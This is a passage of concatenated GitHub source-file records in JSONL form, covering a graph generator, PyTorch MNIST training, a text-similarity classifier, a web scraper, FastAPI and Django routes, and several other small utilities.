for j in range(byzantine_size, byzantine_size + honest_size):\n if random.random() < 0.9:\n G.add_edge(i, j)\n\n # coloring graph\n colorList = []\n for node in G.nodes(data=True):\n if node[1][\"type\"] == 'byzantine':\n colorList.append(\"red\")\n else:\n colorList.append(\"blue\")\n\n # drawing graph\n draw_networkx(G, node_color=colorList)\n plt.savefig(\"random_graph.png\")\n plt.clf()\n\n # adjacency list generation\n adjList = {}\n for i in range(byzantine_size + honest_size):\n adjList[i] = [n for n in G.neighbors(i)]\n\n return adjList, byzantine_output, total_size, diameter, density\n\n\ndef get_linear_graph(bsize):\n byzantine_size = bsize # number of byzantine nodes\n honest_size = 2 * byzantine_size + 1 # number of honest nodes\n diameter = honest_size - 1\n total_size = byzantine_size + honest_size\n\n byzantine_output = []\n for i in range(byzantine_size):\n byzantine_output.append(i)\n\n # graph generation\n G = Graph()\n\n # coloring graph\n colorList = []\n for i in range(byzantine_size):\n colorList.append('r')\n\n for i in range(honest_size):\n colorList.append('b')\n\n # adding nodes\n for i in range(byzantine_size):\n G.add_node(i, type='byzantine')\n\n for i in range(honest_size):\n G.add_node(byzantine_size + i, type='honest')\n\n # adding edges\n for i in range(byzantine_size):\n for j in range(byzantine_size, byzantine_size + honest_size):\n if random.random() < 0.8:\n G.add_edge(i, j)\n\n for i in range(honest_size - 1):\n G.add_edge(byzantine_size + i, byzantine_size + i + 1)\n\n # drawing graph\n draw_networkx(G, node_color=colorList)\n plt.savefig(\"linear_graph.png\")\n plt.clf()\n\n # adjacency list generation\n adjList = {}\n\n for i in range(byzantine_size + honest_size):\n adjList[i] = [n for n in G.neighbors(i)]\n\n density = 2*honest_size/((honest_size-1)*honest_size)\n\n return adjList, byzantine_output, total_size, diameter, density\n\n","repo_name":"matthew-ding/primes-project-2021","sub_path":"graphGenerator.py","file_name":"graphGenerator.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10326055314","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom mnist import get_dataset\nfrom model import Net\nimport matplotlib.pyplot as plt # グラフ出力用module\nimport os\nfrom pathlib import Path\n\nBATCH_SIZE = 100\nWEIGHT_DECAY = 0.005\nLEARNING_RATE = 0.0001\nEPOCH = 25\n\n\ndef get_device(device_type):\n if device_type is not None:\n return torch.device(device_type)\n elif hasattr(torch.backends, \"mps\") and torch.backends.mps.is_available():\n return torch.device(\"mps\")\n elif torch.cuda.is_available():\n return torch.device(\"cuda\")\n else:\n return torch.device(\"cpu\")\n\n\ndef main():\n trainloader, testloader = get_dataset(\"./data\")\n\n # GPUの定義\n device = get_device()\n\n # モデルの定義\n net = Net()\n net = net.to(device)\n\n # 誤差関数の定義\n criterion = nn.CrossEntropyLoss()\n\n # 最適化手法の定義\n optimizer = optim.SGD(\n net.parameters(), lr=LEARNING_RATE, momentum=0.9, weight_decay=WEIGHT_DECAY\n )\n # 学習\n loss_value, acc_value, net = training(\n device, net, trainloader, testloader, criterion, optimizer\n )\n\n # モデルの保存\n if not os.path.isdir(\"./result\"):\n os.mkdir(\"./result\")\n p = Path(\"./result\")\n torch.save(net.state_dict(), str(p / \"latest.pth\"))\n\n # 可視化\n output_graph(loss_value, acc_value)\n\n\ndef training(device, net, trainloader, testloader, criterion, optimizer):\n loss_value = [] # testのlossを保持するlist\n acc_value = [] # testのaccuracyを保持するlist\n\n for epoch in range(EPOCH):\n # トレーニング\n for (inputs, labels) in trainloader:\n inputs, labels = inputs.to(device), labels.to(device)\n optimizer.zero_grad()\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n sum_loss = 0.0\n sum_correct = 0\n sum_total = 0\n\n # テスト\n with torch.no_grad():\n for (inputs, labels) in testloader:\n inputs, labels = inputs.to(device), labels.to(device)\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n sum_loss += loss.item()\n _, predicted = outputs.max(1)\n sum_total += labels.size(0)\n sum_correct += (predicted == labels).sum().item()\n\n loss_rate = sum_loss * BATCH_SIZE / len(testloader.dataset)\n accuracy = float(sum_correct / sum_total)\n print(f\"[{epoch + 1:3d}] loss={loss_rate:8.6f}, accuracy={accuracy:8.6f}\")\n\n loss_value.append(sum_loss * BATCH_SIZE / len(testloader.dataset))\n acc_value.append(float(sum_correct / sum_total))\n\n return loss_value, acc_value, net\n\n\ndef output_graph(loss_value, acc_value, path=\"./result\"):\n # グラフ描画用\n plt.figure(figsize=(6, 6))\n\n if not os.path.isdir(path):\n os.mkdir(path)\n p = Path(path)\n\n xlim = len(loss_value)\n # 以下グラフ描画\n plt.plot(range(xlim), loss_value)\n plt.xlim(0, xlim)\n plt.ylim(0, 2.5)\n plt.xlabel(\"EPOCH\")\n plt.ylabel(\"LOSS\")\n plt.legend([\"loss\"])\n plt.title(\"loss\")\n plt.savefig(str(p / \"loss_image.png\"))\n plt.clf()\n\n xlim = len(acc_value)\n plt.plot(range(xlim), acc_value)\n plt.xlim(0, xlim)\n plt.ylim(0, 1)\n plt.xlabel(\"EPOCH\")\n plt.ylabel(\"ACCURACY\")\n plt.legend([\"acc\"])\n plt.title(\"accuracy\")\n plt.savefig(str(p / \"accuracy_image.png\"))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tshrt-boop/sample-cnn","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14250318776","text":"'''\r\nCreated on 2018年8月8日\r\n\r\n@author: Admin\r\n'''\r\n\r\nfrom LightMysql import LightMysql\r\nimport logging\r\nimport numpy\r\nfrom zhcnSegment import Seg\r\nfrom collections import defaultdict\r\nfrom regular import checkData\r\nfrom sentenceSimilarity import SentenceSimilarity\r\n\r\ndef trainData():\r\n # 配置信息,其中host, port, user, passwd, db为必需\r\n dbconfig = {'host':'127.0.0.1',\r\n 'port': 3306,\r\n 'user':'root',\r\n 'passwd':'root',\r\n 'db':'ah_q_text_classify',\r\n 'charset':'utf8'}\r\n result = None\r\n try:\r\n QUERY_ALL_ALARMOBJET = \" SELECT\"\r\n QUERY_ALL_ALARMOBJET += \" question ,label_2\"\r\n QUERY_ALL_ALARMOBJET += \" FROM q_original_lable \";\r\n QUERY_ALL_ALARMOBJET += \" WHERE 1=1 and status=1 \"\r\n db = LightMysql(dbconfig) # 创建LightMysql对象,若连接超时,会自动重连\r\n sql_select = QUERY_ALL_ALARMOBJET\r\n# print(sql_select)\r\n result, colmun = db.query(sql_select, 'all') # 返回有多少行\r\n except Exception as e:\r\n logging.error(e)\r\n finally:\r\n if(db != None):\r\n db.close() # 操作结束,关闭对象\r\n return result \r\n\r\ndef readDictData(original_ss, dict):\r\n values = []\r\n with open('ah_data_2.txt', encoding='utf-8') as f:\r\n line = f.readline()\r\n while line:\r\n data = line.split(':')\r\n dict[data[1]] = data[0]\r\n values.append(data[1])\r\n \r\n line = f.readline()\r\n \r\n original_ss.set_sentences(values)\r\n\r\n\r\n\r\n\r\n# 用于周末的比对\r\ndata = trainData()\r\ntrain_data = numpy.array(data)[:, 0]\r\nlable = numpy.array(data)[:, 1]\r\n\r\nfrom sklearn.model_selection import train_test_split, KFold, cross_val_score\r\nX_train, X_test, Y_train, Y_test = train_test_split(train_data, lable, test_size=0.1, random_state=0, shuffle=True)\r\ndef dictTest():\r\n dict = {}\r\n seg = Seg()\r\n original_ss = SentenceSimilarity(seg)\r\n readDictData(original_ss, dict)\r\n original_ss.TfidfModel()\r\n# original_ss.LdaModel()\r\n# original_ss.LsiModel()\r\n total_data_len = len(X_test)\r\n success_len = 0\r\n f1 = open('ah_data_lsi.txt', 'w', encoding='utf-8')\r\n for i in range(len(X_test)):\r\n print(\"-------------------------------------\")\r\n text = checkData(X_test[i]);\r\n text = \"\".join(seg.cut_for_search(text))\r\n print(\"测试内容: \" + text)\r\n \r\n try :\r\n sentences = original_ss.similarityArray(text)\r\n sentences = sorted(sentences, key=lambda e:e.get_score(), reverse=True)\r\n count = 0\r\n for sentence in sentences:\r\n if sentence.get_score() > 0.9:\r\n print(sentence.get_score())\r\n \r\n if sentence.get_score() == 1.0:\r\n count = count + 1\r\n \r\n sentence = original_ss.similarity(text)\r\n if count < 2 and dict.get(sentence.get_origin_sentence()) == Y_test[i]:\r\n success_len = success_len + 1\r\n else:\r\n y = Y_test[i]\r\n f1.writelines(\"-------------------------------------\\n\")\r\n f1.writelines(\"测试内容: \" + text + \"\\n\")\r\n for sentence in sentences:\r\n f1.writelines(\"匹配标签: 【\" + dict.get(sentence.get_origin_sentence()) + \"】 真实标签:【\" + y + \"】 评分: \" + str(sentence.get_score()) + \"\\n\")\r\n except Exception as e:\r\n print(e)\r\n print(success_len / total_data_len)\r\n\r\ndictTest()\r\n\r\n\r\n\r\n# from sklearn.model_selection import train_test_split, KFold, cross_val_score\r\n# X_train, X_test, Y_train, Y_test = train_test_split(train_data, lable, test_size=0.1, random_state=0, shuffle=True) \r\n# \r\n# print(\"train len : %d\" % len(X_train))\r\n# print(\"test len : %d\" % len(X_test))\r\n# \r\n# # 根据类别拼接成一个句子\r\n# dict = {}\r\n# seg = Seg()\r\n# for i in range(len(X_train)):\r\n# key = Y_train[i]\r\n# value = X_train[i]\r\n# text = checkData(value);\r\n# text = seg.cut_for_search(text)\r\n# print(\"\".join(text))\r\n# # print(success_len / total_data_len)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Peterzwb/tfidfClassify","sub_path":"similar/computing_word_test.py","file_name":"computing_word_test.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"10347470404","text":"#import pwb\n\n'''\nhttps://en.wikisource.org/wiki/Index:The_Kiss_and_Other_Stories_by_Anton_Tchekhoff,_1908.pdf\n\npage info: https://en.wikisource.org/w/index.php?title=Index:The_Kiss_and_Other_Stories_by_Anton_Tchekhoff,_1908.pdf&action=info\n\nGives wikidata id as\nhttps://www.wikidata.org/wiki/Special:EntityPage/Q89675998\n\nBut it has low details.\n\nThis has high details\nhttps://www.wikidata.org/wiki/Q15839163\n\n\n'''\n\n\nimport pywikibot\nsite = pywikibot.Site('en', 'wikisource.beta.wmflabs.org') # any site will work, this is just an example\npage = pywikibot.Page(site, 'Index:War_and_Peace.djvu')\nprint(page)\nitem = pywikibot.ItemPage.fromPage(page) \nprint(item)\n\n# [[wikidata:Q89675998]]\n\n\n'''\n\nsite = pywikibot.Site('', 'wikisource') # any site will work, this is just an example\npage = pywikibot.Page(site, 'Index:The Kiss and Other Stories by Anton Tchekhoff, 1908.pdf')\nitem = pywikibot.ItemPage.fromPage(page) \nprint(item)\n'''\n","repo_name":"tshrinivasan/wikisource_wikidata_integration","sub_path":"bot/extra/search-in-wikidata.py","file_name":"search-in-wikidata.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"391089071","text":"from django.urls import path, include\nfrom rest_framework import routers\nfrom .views import FriendViewSet, ProfileViewSet, SearchViewSet, MyPageView\n\n\nrouter = routers.DefaultRouter()\nrouter.register(\"friends\", FriendViewSet)\nrouter.register(\"profiles\", ProfileViewSet, basename=\"profile\")\nrouter.register(\"search\", SearchViewSet)\n\nurlpatterns = [\n path(\"\", include(router.urls)),\n path(\"mypage/\", MyPageView.as_view(), name=\"my-page\"),\n]\n","repo_name":"LeeJuHwan/DjangoTutorial","sub_path":"sns_api_practice/config/profiles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23547857233","text":"#!/usr/bin/env python\n\n\"\"\"@package docstring\nFile: nematic_order.py\nAuthor: Adam Lamson\nEmail: alamson@flatironinstitute.org\nDescription:\n\"\"\"\nimport numpy as np\n\n\ndef calc_nematic_order(syls):\n \"\"\"Calculate the nematic order parameter for a set of syls\n\n :syls: Raw sylinder data from HDF5 file. PBCs should be applied.\n :returns: Array of nematic order parameters for each frame\n\n \"\"\"\n \n # Get necessary derived functions\n directions = syls[:,5:8, :] - syls[:, 2:5, :] \n lengths = np.linalg.norm(directions, axis=1)\n unit_dirs = directions / lengths[:, None, :]\n n_syls = syls.shape[0]\n\n # nematic_tensor averaged over all sylinders\n nematic_tensor = (np.einsum('ijk,ilk->jlk', unit_dirs, unit_dirs) \n - np.eye(3)[:,:,None]/3.)/n_syls\n \n nematic_order = []\n for i in range(nematic_tensor.shape[2]):\n nematic_order.append(np.max(np.linalg.eigvals(nematic_tensor[:,:,i])))\n\n ## Possible vectorized version\n # ufunc_eigvals = np.vectorize(np.linalg.eigvals, signature='(n)->()')\n # nematic_order = np.max(ufunc_eigvals(nematic_tensor, axis=(0,1)), axis=0)\n\n return np.array(nematic_order)\n \n\n","repo_name":"flatironinstitute/aLENS_analysis","sub_path":"alens_analysis/nematic_order.py","file_name":"nematic_order.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5142438603","text":"import s3fs\nimport pandas\n\n\nclass DataLoader:\n @classmethod\n def load_data(\n cls,\n receiver_id: str,\n receivers_data_bucket: str,\n ) -> list:\n '''\n Retrieve the last 40 days of a receiver's S3-hosted data as a list.\n \n \n In[1] : DataLoader.load_data(\n receiver_id=\"receiver#00000001\",\n receivers_data_bucket=\"receivers-data\",\n )\n \n Out[1]: [31, 30, 29, ..., 10, 11, 10]\n \n '''\n last_40_days_data_series = (\n pandas\n .read_csv(\n f\"s3://{receivers_data_bucket}/{receiver_id}/data.csv\",\n header=None,\n index_col=0, \n squeeze=True,\n )\n .tail(40)\n )\n\n return last_40_days_data_series.values.tolist()\n","repo_name":"zinedine-zeitnot/anomaly-detection","sub_path":"functions/loadData/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"36690906545","text":"#실습\r\n# 네이버 최신 1000건의 평점 데이터를 그롤링하여\r\n# 테이블을 만들고 리뷰수가 10회 이상이면서\r\n# 평점이 8 이상인 영화를 추천하시오\r\n\r\n\r\nfrom urlToStr2 import urlToStr\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef naverCraw(page) :\r\n data=urlToStr(\"https://movie.naver.com/movie/point/af/list.nhn?&page=\"+page)\r\n\r\n bs = BeautifulSoup(data, \"html.parser\")\r\n\r\n tit3s=bs.select(\"tbody>tr\")\r\n\r\n cnt=0\r\n datars=[]\r\n for tit3 in tit3s :\r\n cnt=cnt+1\r\n datars1=[]\r\n mvname = tit3.find(\"a\").text\r\n star = int(tit3.find(\"em\").text)\r\n writer = tit3.select_one(\".author\").text\r\n cdate = tit3.find_all(\"td\")[2].text.split(\"****\")[1]\r\n datars1.append(mvname)\r\n datars1.append(star)\r\n datars1.append(writer)\r\n datars1.append(cdate)\r\n #print(cnt, \":\", mvname, star, writer, cdate)\r\n datars1=tuple(datars1)\r\n datars.append(datars1)\r\n #print(datars1)\r\n #print(\"-\"*30)\r\n\r\n return datars\r\n\r\nif __name__ == \"__main__\" :\r\n datars=naverCraw(\"2\")\r\n print(datars)\r\n\r\n\r\n\r\n\r\n\r\n ","repo_name":"hwsonnn/python_crawling","sub_path":"희원_python/!_0206__movie_!.py","file_name":"!_0206__movie_!.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42724388324","text":"import FWCore.ParameterSet.Config as cms\n\n\nfrom MyEDmodules.HcalTimingAnalyzer.hcalFilteredReco_cff import *\n\nhfrhfilt06ns.detIds2Mask = cms.vint32(-32,45,2)\nhfrhfilt10ns.detIds2Mask = cms.vint32(-32,45,2)\nhfrhfilt1ts.detIds2Mask = cms.vint32(-32,45,2)\nhfrhfilt4ts.detIds2Mask = cms.vint32(-32,45,2)\n\n#--------------------------------------------------\n# Shifted filters -> feed into towers, MET, etc.\n# faster than feeding hbherhshift in, can do them in parallel\n#\nhbherhfiltshp.timeShiftNs = cms.double(25.0)\nhorhfiltshp.timeShiftNs = cms.double(25.0)\n\n#--------------------------------------------------\n# Shifted \"un\"filters -> have to be all set up from scratch\n\nunfiltTowersShift = towerMaker.clone()\nunfiltTowersShift.hbheInput = cms.InputTag(\"hbherhshift\")\nunfiltTowersShift.hoInput = cms.InputTag(\"horhshift\")\nunfiltTowersShift.hfInput = cms.InputTag(\"hfrhshift\")\nunfiltmetNoHFshift = metNoHF.clone(src = \"unfiltTowersShift\")\nmyanunfiltShift = myan.clone()\nmyanunfiltShift.eventDataPset.hbheRechitLabel = cms.untracked.InputTag(\"hbherhshift\")\nmyanunfiltShift.eventDataPset.hoRechitLabel = cms.untracked.InputTag(\"horhshift\")\nmyanunfiltShift.eventDataPset.hfRechitLabel = cms.untracked.InputTag(\"hfrhshift\")\n\nrhshift = cms.Sequence(hbherhshift+horhshift+hfrhshift)\nunfiltShift = cms.Sequence(rhshift*\n unfiltTowersShift*\n unfiltmetNoHFshift*\n myanunfiltShift)\n\ntimeFiltSeqShifted = cms.Sequence(unfiltShift*filtshp)\n\nhbherhfiltshp.rhProfilingPset = cms.untracked.PSet(\n thresholds = cms.untracked.vdouble(4.0,7.5,10.0,15.0))\n","repo_name":"pdudero/usercode","sub_path":"MyEDmodules/HcalTimingAnalyzer/python/hcalFilteredReco4CRAFTshifted_cff.py","file_name":"hcalFilteredReco4CRAFTshifted_cff.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71532234001","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfifa = pd.read_csv('fifa_data.csv')\r\nfifa.head()\r\n\r\nplt.figure(figsize=(8,5), dpi=100)\r\nplt.title('Distribution of skill level in fifa 2018')\r\nbins = [40,50,60,70,80,90,100]\r\nplt.hist(fifa.Overall, bins=bins)\r\nplt.xticks(bins)\r\nplt.xlabel('Skill level')\r\nplt.ylabel('Number of players')\r\nplt.savefig('distribution.png')\r\nplt.show();","repo_name":"heisdenverr/sentimentanalysis","sub_path":"spider-demo/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10585621396","text":"# https://docs.python.org/3/library/configparser.html\nimport configparser\n# https://github.com/python/cpython/tree/3.6/Lib/configparser.py\n# Java의 Properties처럼, config 파일을 읽고 쓰기 위한 라이브러리\n# 백엔드 어플리케이션의 설정을 관리한다고 가정하고, config를 read/write하도록 해보자\n\nconfig = configparser.ConfigParser()\n\nconfig['MongoDB'] = {\n 'host': 'localhost',\n 'port': 27017,\n 'db': 'Awesome'\n}\n\nconfig['RUN-SETTING'] = {\n 'port': 5000,\n 'debug': True\n}\n\nwith open('config.conf', 'w') as file:\n config.write(file)\n\nconfig.read('config.conf')\n\nprint(config['MongoDB'])\n# <Section: MongoDB>\n\nfor k, v in config['MongoDB'].items():\n print(k, v)\n # key, value는 무조건 str\n\nprint(config['RUN-SETTING']['debug'])\n# 'True'\n\nprint(config['RUN-SETTING'].getboolean('debug'))\n# True","repo_name":"JoMingyu/--Awesome-Python--","sub_path":"000. Python Standard Library/File Formats/configparser - Configuration file parser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"ko","doc_type":"code","stars":190,"dataset":"github-code","pt":"3"} +{"seq_id":"34625279758","text":"from sqlalchemy.orm import Session\nfrom fastapi import APIRouter, Depends, HTTPException, Path, UploadFile, File, Form\nfrom starlette import status\nfrom pydantic import BaseModel, Field\n\nfrom database import SessionLocal\nfrom models import Product\n\nrouter = APIRouter(\n prefix='/product',\n tags=['products']\n)\n\n\nclass ProductRequest(BaseModel):\n name: str\n image: UploadFile = None\n price: int\n display_order: int\n remaining_quantity: int\n is_active: bool\n filial: str\n\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n\n finally:\n db.close()\n\n\n@router.get('/', status_code=status.HTTP_200_OK)\nasync def get_all_products(db: Session = Depends(get_db)):\n result = db.query(Product).all()\n if result:\n return result\n\n raise HTTPException(status_code=404, detail='Products not found.')\n\n\n@router.get('/{product_id}', status_code=status.HTTP_200_OK)\nasync def get_current_products(product_id: int, db: Session = Depends(get_db)):\n current_product = db.query(Product).filter(Product.id == product_id).first()\n if current_product:\n return current_product\n\n raise HTTPException(status_code=404, detail='Products not found.')\n\n\n@router.post('/add-product', status_code=status.HTTP_201_CREATED)\nasync def add_product(db: Session = Depends(get_db), product_request: ProductRequest = Depends(ProductRequest)):\n\n product_model = Product(name=product_request.name,\n image=product_request.image.filename,\n price=product_request.price,\n display_order=product_request.display_order,\n remaining_quantity=product_request.remaining_quantity,\n is_active=product_request.is_active,\n filial=product_request.filial)\n db.add(product_model)\n db.commit()\n\n\n@router.put('/update-product/{product_id}', status_code=status.HTTP_204_NO_CONTENT)\nasync def update_product(product_id: int, db: Session = Depends(get_db),\n product_request: ProductRequest = Depends(ProductRequest)):\n\n product_model = db.query(Product).filter(Product.id == product_id).first()\n\n if product_model is None:\n raise HTTPException(status_code=404, detail='Product not found.')\n\n product_model.name = product_request.name\n product_model.image = product_request.image.filename\n product_model.price = product_request.price\n product_model.display_order = product_request.display_order\n product_model.remaining_quantity = product_request.remaining_quantity\n product_model.is_active = product_request.is_active\n product_model.filial = product_request.filial\n\n db.add(product_model)\n db.commit()\n\n\n@router.delete('/delete-product/{product_id}', status_code=status.HTTP_204_NO_CONTENT)\nasync def delete_product(product_id: int, db: Session = Depends(get_db)):\n product_model = db.query(Product).filter(Product.id == product_id).first()\n if product_model is None:\n raise HTTPException(status_code=404, detail='Product not found.')\n\n db.query(Product).filter(Product.id == product_id).delete()\n db.commit()\n","repo_name":"BM021/Marketing_app","sub_path":"routers/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7380010350","text":"from selenium import webdriver\nimport unittest\n\nbrowser = webdriver.Chrome(\"/Users/bradWaterhouse/Downloads/chromedriver\")\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_experimental_option(\"detach\", True)\nchrome_options.add_argument(\"--headless\")\nchrome_options.add_argument(\"--disable-infobars\")\nchrome_options.add_experimental_option(\"prefs\", {\n \"profile.default_content_setting_values.notifications\": 2\n})\n\n\nclass TestStringMethods(unittest.TestCase):\n\n def test_page_has_rendered_correctly(self):\n chrome_options.add_experimental_option(\"detach\", True)\n browser.get('https://www.bunches.co.uk')\n\n self.assertTrue(browser.find_element_by_xpath('/html/body/div[2]/div/div[2]/div[1]/div[1]/a/img').is_displayed())\n self.assertTrue(browser.find_element_by_xpath('// *[ @ id = \"navigation-menu\"] / li[1] / div / a').is_displayed())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"BradWaterhouse/selenium-testing","sub_path":"tests/homepage.py","file_name":"homepage.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73867179920","text":"from flaskweb import db\r\nimport datetime\r\n\r\ndef meanRating(services):\r\n for j in services:\r\n length = len(j['Rating'])\r\n if length == 0:\r\n j['meanRating'] = 0\r\n else:\r\n sum1 = sum(j['Rating'])\r\n meanRating = sum1 / length\r\n meanRating = round(meanRating, 1)\r\n j['meanRating'] = meanRating\r\n services = sorted(services, key=lambda k: -(k.get('meanRating')))\r\n return services\r\n\r\ndef getServices(name):\r\n cursor = db.Services.find({'Type':name})\r\n services = []\r\n for i in cursor:\r\n services.append(i)\r\n services = meanRating(services)\r\n return services\r\n\r\ndef getInfo(name, id_):\r\n data = getServices(name)\r\n for i in data:\r\n if str(i.get('id_')) == id_:\r\n return i\r\n\r\ndef updateRating(name, id_, rating):\r\n alist = db.Services.find_one({'Type': name, 'id_': int(id_)}).get('Rating')\r\n alist.append(int(rating))\r\n db.Services.update_one(\r\n {'type': name, 'id_': int(id_)},\r\n {'$set': {\r\n 'rating': alist\r\n }}\r\n )\r\n\r\ndef updateFavorite(email, service_name, service_id):\r\n alist = db.user.find_one({'email': email}).get('favorite')\r\n service = {'Type': service_name, 'id_': service_id}\r\n if service not in alist:\r\n alist.insert(0, service)\r\n db.user.update_one(\r\n {'email': email},\r\n {'$set': {\r\n 'favorite': alist\r\n }}\r\n )\r\n return 'success'\r\n else:\r\n return 'fail'\r\n\r\ndef getFavorite(email):\r\n alist = db.user.find_one({'email': email}).get('favorite')\r\n favoData = []\r\n for i in alist:\r\n favoData.append(getInfo(i['Type'], i['id_']))\r\n return favoData\r\n\r\n\r\ndef pass_today():\r\n dic = {'0':'Monday', '1':'Tuesday', '2':'Wednesday', '3':'Thursday',\r\n '4':'Friday', '5':'Saturday', '6':'Sunday'}\r\n day = datetime.datetime.today().weekday()\r\n return dic[str(day)]\r\n","repo_name":"xhua167/IE2","sub_path":"flaskweb/getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74026978001","text":"import os\nfrom .common import *\nfrom pathlib import Path\nfrom typing import List, Union\nimport requests\nimport time\n\nRETRY_MAX_NUM = os.getenv(\"RETRY_MAX_NUM\", 5) #最大重试次数(默认五次)\nRETRY_INTERVAL = os.getenv(\"RETRY_INTERVAL\", 3) #重试间隔时间(默认3秒)\n\ndef startswith(p: Path, start: Path) -> bool:\n try:\n p.relative_to(str(start.resolve()))\n return True\n except Exception as e:\n return False\n\n\ndef get_project_root(p: Path) -> Path:\n \"\"\"获取 Project 根目录\n \"\"\"\n while str(p.resolve()) != \"/\":\n if is_project_dir(p):\n return p\n p = p.resolve().parent\n return None\n\n\ndef get_konfig_root() -> Path:\n \"\"\"获取大库根目录\n \"\"\"\n p = Path(os.getcwd())\n while str(p.resolve()) != \"/\":\n if (p / KCLMOD_FILE).is_file() and (p / HACK_DIR).is_dir():\n return p\n p = p.resolve().parent\n return Path(os.getcwd())\n\n\ndef get_konfig_projects() -> List[Path]:\n \"\"\"获取大库所有 project 目录\n \"\"\"\n result = []\n for project_dir, _, _ in os.walk(get_konfig_root()):\n project_dir = Path(project_dir)\n if is_project_dir(project_dir):\n result.append(project_dir)\n return result\n\n\ndef get_konfig_projects_relative() -> List[Path]:\n \"\"\"获取大库所有 project 相对于根目录的路径\n \"\"\"\n project_dirs = get_konfig_projects()\n konfig_root = get_konfig_root()\n return [item.relative_to(konfig_root) for item in project_dirs]\n\ndef get_changed_files_from_oss(change_paths_url):\n \"\"\"从OSS获取文件变更列表\n \"\"\"\n times = 0 #重试计数\n while times < RETRY_MAX_NUM:\n try:\n down_res = requests.get(change_paths_url)\n if not down_res:\n raise Exception(f'Empty down resource: {down_res}')\n down_res_content = down_res.content\n if not down_res_content:\n raise Exception(f'Empty down resource content: {down_res_content}')\n change_paths_str = down_res_content.decode()\n break\n except Exception as e:\n times += 1\n if times >= RETRY_MAX_NUM:\n print(f'>> Exceed maximal retry {RETRY_MAX_NUM}, Raise exception...')\n raise(e) # will stop the program without further handling\n else:\n time.sleep(RETRY_INTERVAL)\n print(f'>> Exception, Retry {times} begins...')\n return change_paths_str\n\ndef is_project_dir(p: Path) -> bool:\n \"\"\"当前目录是否为项目目录\n \"\"\"\n project_file = p / PROJECT_FILE\n return project_file.is_file()\n\n\ndef is_stack_dir(p: Path) -> bool:\n \"\"\"当前目录是否为 Stack 目录\n \"\"\"\n stack_file = p / STACK_FILE\n return stack_file.is_file()\n\n\ndef has_settings_file(path: Path) -> bool:\n \"\"\"当前目录是否包含 settings 文件\n \"\"\"\n settings_file = path / SETTINGS_FILE\n return settings_file.is_file()\n\n\ndef check_path_is_relative_to(\n path_a: Union[str, Path], path_b: Union[str, Path]\n):\n \"\"\"\n check if path_a is relative to path_b.\n Here are some examples:\n path_a: Path('/etc/passwd/') path_b: Path('/etc') True\n path_a: Path('/etc/') path_b: Path('/etc') True\n path_a: Path('/etc/a/b/c') path_b: Path('/etc') True\n path_a: Path('/usr/') path_b: Path('/etc') False\n\n :param path_a: string type or pathlib.Path type.\n :param path_b: string type or pathlib.Path type.\n :return: if path_a is relative to path_b.\n \"\"\"\n return Path(path_b) in [p for p in Path(path_a).parents] + [Path(path_a)]\n\n\ndef filter_project_dir() -> List[Path]:\n \"\"\"\n filter the project_dirs by $CHANGED_FILE_URL and $IGNORE_PATHS, only changed project will be reserved.\n $CHANGED_FILE_URL:\n string type.\n the url contains a changed_file.txt file and the file's content is changed file paths separated by newline.\n passed from env variable $CHANGED_FILE_URL\n $IGNORE_PATHS:\n ignore_paths_str: string type.\n paths to ignore separated by ','. the path to ignore should be project level directory or higher.\n passed from env variable IGNORE_PATHS\n :return: the filtered dirs\n \"\"\"\n all_project_dirs = get_konfig_projects_relative()\n # use string output directly\n change_file = os.getenv(\"CHANGED_FILE\")\n ignore_paths_str = os.getenv(\"IGNORE_PATHS\")\n mode_filter = os.getenv(\"KCL_TEST_MODE\")\n\n if mode_filter != \"biz\":\n # when KCL_TEST_MODE is 'base', all test cases under Konfig/sigma will be tested\n change_paths = all_project_dirs\n else:\n # change_paths_str = get_changed_files_from_oss(change_paths_url)\n change_paths_str = change_file\n print(f'Change Path: {change_paths_str}')\n if 